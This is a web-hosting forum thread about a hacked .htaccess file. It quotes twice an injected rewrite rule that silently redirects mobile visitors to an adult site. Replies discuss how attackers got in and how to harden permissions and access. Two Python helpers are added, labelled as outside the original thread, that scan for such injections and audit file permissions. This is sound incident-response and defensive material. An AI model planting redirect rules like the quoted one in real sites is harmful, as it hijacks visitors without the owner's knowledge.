htaccess hacked :(


viper357
02-27-2014, 12:03 PM
Was doing some SEO work today and noticed this at the bottom of my htaccess file :(

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "android|blackberry|ipad|iphone|ipod|iemobile|opera mobile|palmos|webos|2.0\ MMP|240x320|400X240|AvantGo|BlackBerry|Blazer|Cell phone|Danger|DoCoMo|Elaine/3.0|EudoraWeb|Googlebot-Mobile|hiptop|IEMobile|KYOCERA/WX310K|LG/U990|MIDP-2.|MMEF20|MOT-V|NetFront|Newt|Nintendo\ Wii|Nitro|Nokia|Opera\ Mini|Palm|PlayStation\ Portable|portalmmm|Proxinet|ProxiNet|SHARP-TQ-GX10|SHG-i900|Small|SonyEricsson|Symbian\ OS|SymbianOS|TS21i-10|UP.Browser|UP.Link|webOS|Windows\ CE|WinWAP|YahooSeeker/M1A1-R2D2|iPhone|iPod|Android|BlackBerry9530|LG-TU915\ Obigo|LGE\ VX|webOS|Nokia5800|w3c\ |w3c-|acs-|alav|alca|amoi|audi|avan|benq|bird|blac|blaz|brew |cell|cldc|cmd-|dang|doco|eric|hipt|htc_|inno|ipaq|ipod|jigs|kddi |keji|leno|lg-c|lg-d|lg-g|lge-|lg/u|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|palm|pana|pant|phil|play|port|prox|qwap |sage|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|wap-|wapa|wapi|wapp|wapr|webc|winw|winw|xda\ |xda-" [NC]
RewriteRule ^(.*)$ http://m.freesexvideosworld.org%{REQUEST_URI} [L,R=302]
So I guess my htaccess file has been hacked, easy enough to fix I suppose by just deleting that, but what can I do to prevent it from happening again? How do I protect my htaccess file from being tampered with?

ForceHSS
02-27-2014, 12:05 PM
Do you have a backup of what it used to be?

ozzy47
02-27-2014, 12:08 PM
Looks like it to me, seems like if you go to the site with a mobile device, it redirects you to a sex site.

Only way that was added to your htaccess is someone gained FTP access or the login info for your server/cpanel.

viper357
02-27-2014, 12:30 PM
> Do you have a backup of what it used to be?

The rest of the file was fine, this code was just added to the bottom of it.

> Looks like it to me, seems like if you go to the site with a mobile device, it redirects you to a sex site.
>
> Only way that was added to your htaccess is someone gained FTP access or the login info for your server/cpanel.

Thanks, I'll change the FTP and cpanel passwords.

> Only way that was added to your htaccess is someone gained FTP access or the login info for your server/cpanel.

Thinking about that now, if they've gained access to my htaccess file then they would have probably had access to my whole server/account. Could they have added this code to any other files?
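
Added example, not part of the original thread: a Python scanner for checking whether the same injection sits in other .htaccess files under the web root. It flags any RewriteRule that redirects to another host while guarded by a User-Agent or Referer condition; the function names, the `own_hosts` parameter and the sample input are assumptions made for illustration.

```python
import os
import re

# A condition keyed on a client-controlled header: the redirect only fires for
# matching visitors, which is why the site owner on a desktop never sees it.
COND_RE = re.compile(r'^\s*RewriteCond\s+%\{HTTP_(USER_AGENT|REFERER)\}', re.I)
# A RewriteRule whose substitution is an absolute URL; captures the host.
RULE_RE = re.compile(r'^\s*RewriteRule\s+\S+\s+https?://([^\s/%]+)', re.I)

# Constructed sample: a normal front-controller rule, then an injected block
# shaped like the one in this thread (shortened pattern, placeholder host).
SAMPLE = r'''RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php?q=$1 [L,QSA]
RewriteCond %{HTTP_USER_AGENT} "android|iphone|ipad" [NC]
RewriteRule ^(.*)$ http://m.injected.example%{REQUEST_URI} [L,R=302]
'''


def scan_htaccess(text, own_hosts=()):
    """Return (line_no, header, host) for every off-site RewriteRule that is
    guarded by a User-Agent or Referer RewriteCond."""
    findings, pending = [], None
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        cond = COND_RE.match(line)
        rule = RULE_RE.match(line)
        if cond:
            pending = cond.group(1).upper()
        elif rule and pending and rule.group(1).lower() not in own_hosts:
            findings.append((no, pending, rule.group(1).lower()))
        # RewriteCond lines apply only to the next RewriteRule, so any other
        # directive ends the block being tracked.
        if stripped and not stripped.lower().startswith(('#', 'rewritecond')):
            pending = None
    return findings


def scan_tree(root, own_hosts=()):
    """Scan every .htaccess under root; return {path: findings} for hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if '.htaccess' in files:
            path = os.path.join(dirpath, '.htaccess')
            with open(path, errors='replace') as fh:
                hits = scan_htaccess(fh.read(), own_hosts)
            if hits:
                report[path] = hits
    return report
```

Pass the site's own hostnames in `own_hosts` so that legitimate redirects to a mobile subdomain are not reported.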

ozzy47
02-27-2014, 12:42 PM
Possibly, best thing to do is download a fresh copy of your vB, same version you are running, and upload the files to the server. You should do it for all mods installed as well.

RichieBoy67
02-27-2014, 12:46 PM
File permissions could have also been wrong giving anyone access to it. Check your file permissions and see if anything else has been impacted. Check out your webmastertools account as well under the security tab and see if it lists anything.

Most directories should be chmod 755 except for those that need write access, most files should be set at chmod 644 depending on your server.
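
Added example, not part of the original thread: a Python audit of a web root against the 755/644 baseline mentioned above, listing anything writable by group or world. The function name and the `writable_dirs` allowlist are assumptions made for illustration.

```python
import os
import stat


def audit_permissions(root, writable_dirs=()):
    """Return sorted (relative_path, mode, reason) for entries under root that
    grant write access beyond the owner, i.e. looser than 755/644.

    writable_dirs lists directories (relative to root) that are meant to be
    writable, such as upload or cache folders; it is an assumption of this
    example, and only the directory entry itself is exempted."""
    findings = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # a symlink's own mode bits are not meaningful
            mode = stat.S_IMODE(st.st_mode)
            rel = os.path.relpath(path, root)
            if stat.S_ISDIR(st.st_mode) and rel in writable_dirs:
                continue
            # A writable directory lets its files be replaced or renamed
            # whatever their own mode is, so directories matter as much as
            # the .htaccess file itself.
            if mode & stat.S_IWOTH:
                findings.append((rel, oct(mode), 'world-writable'))
            elif mode & stat.S_IWGRP:
                findings.append((rel, oct(mode), 'group-writable'))
    return sorted(findings)
```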

TheLastSuperman
02-27-2014, 12:47 PM
Ahh I ran into this the other day as well when working on a site and it had two vulnerabilities... it still had vBSEO installed and had the /install/ folder on the server so be sure to switch vBSEO to DBSEO OR Remove it entirely and rewrite the urls AND/OR delete the install folder if present on your server.

Code from the .htaccess I ran into:
RewriteCond %{HTTP_USER_AGENT} "android|blackberry|ipad|iphone|ipod|iemobile|opera mobile|palmos|webos|2.0\ MMP|240x320|400X240|AvantGo|BlackBerry|Blazer|Cell phone|Danger|DoCoMo|Elaine/3.0|EudoraWeb|Googlebot-Mobile|hiptop|IEMobile|KYOCERA/WX310K|LG/U990|MIDP-2.|MMEF20|MOT-V|NetFront|Newt|Nintendo\ Wii|Nitro|Nokia|Opera\ Mini|Palm|PlayStation\ Portable|portalmmm|Proxinet|ProxiNet|SHARP-TQ-GX10|SHG-i900|Small|SonyEricsson|Symbian\ OS|SymbianOS|TS21i-10|UP.Browser|UP.Link|webOS|Windows\ CE|WinWAP|YahooSeeker/M1A1-R2D2|iPhone|iPod|Android|BlackBerry9530|LG-TU915\ Obigo|LGE\ VX|webOS|Nokia5800|w3c\ |w3c-|acs-|alav|alca|amoi|audi|avan|benq|bird|blac|blaz|brew |cell|cldc|cmd-|dang|doco|eric|hipt|htc_|inno|ipaq|ipod|jigs|kddi |keji|leno|lg-c|lg-d|lg-g|lge-|lg/u|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|palm|pana|pant|phil|play|port|prox|qwap |sage|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|wap-|wapa|wapi|wapp|wapr|webc|winw|winw|xda\ |xda-" [NC]
RewriteRule ^(.*)$ http://m.freesexvideosworld.org%{REQUEST_URI} [L,R=302]

viper357
02-27-2014, 01:03 PM
Thanks everyone.

I've never had vbseo installed (just the sitemap generator) and the /install folder was deleted years ago.

TheLastSuperman
02-27-2014, 01:11 PM
> Thanks everyone.
>
> I've never had vbseo installed (just the sitemap generator) and the /install folder was deleted years ago.

Is your forum updated to 4.2.1/4.2.2 OR if a slightly older version is it patched? Make sure it's patched at least, if not they may have gotten in that way.

viper357
02-27-2014, 01:49 PM
I'm on 3.8.5

I know there are updates to vb3, but I've made loads of template edits, so an upgrade means losing all of those. I need to find time to update.

RichieBoy67
02-27-2014, 02:19 PM
I've seen people who had it set wide open accidentally. If that is the only file edited then I would check that first.

Simon Lloyd
02-27-2014, 08:44 PM
You could also add rules to it to prevent it being opened by anyone except the person with the correct IP and/or username :)

<Files "*">
# Apache 2.2 access-control directives (provided by mod_access_compat on Apache 2.4)
# deny,allow: Deny rules are evaluated first, then Allow rules override them
Order deny,allow
Deny from all
Allow from 128.252.135.
Allow from .mydomain.com
Allow from host.mydomain.com
</Files>

Put this in your .htaccess that is above /public_html; change the IP address to yours and the domain names (host.mydomain.com would be the name of your server, like for instance vborg.vbulletin.org if the name of .org's server was set out like that).

With that, only you and your server would have access to the files :). If you mess it up and you are on a VPS then only your hosts will be able to fix it, so be careful.